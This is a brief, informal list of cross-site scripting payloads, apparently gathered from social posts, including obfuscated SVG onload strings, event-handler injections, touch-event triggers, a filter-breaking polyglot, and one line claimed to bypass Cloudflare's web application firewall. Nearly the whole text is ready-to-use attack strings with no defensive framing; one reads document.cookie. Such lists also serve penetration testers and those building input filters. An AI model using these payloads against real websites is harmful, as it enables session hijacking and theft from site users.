Cross Site Scripting (XSS)

Payloads

<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg onload="alert(1)" <="" svg=""
GUYS bypassed cloud flare using this payload
"><x/Onpointerrawupdate=confirm(document.cookie)>kira_deathnote
‟><marquee/onstart=confirm(1)>
"onfocus="alert`1`"autofocus="
Useful #XSS Payloads -
"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
XSS
<body ontouchstart=alert(1)>
Triggers when a finger touch the screen
<body ontouchend=alert(1)>
Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)>
When a finger is dragged across the screen.
$` onerror=alert(1);//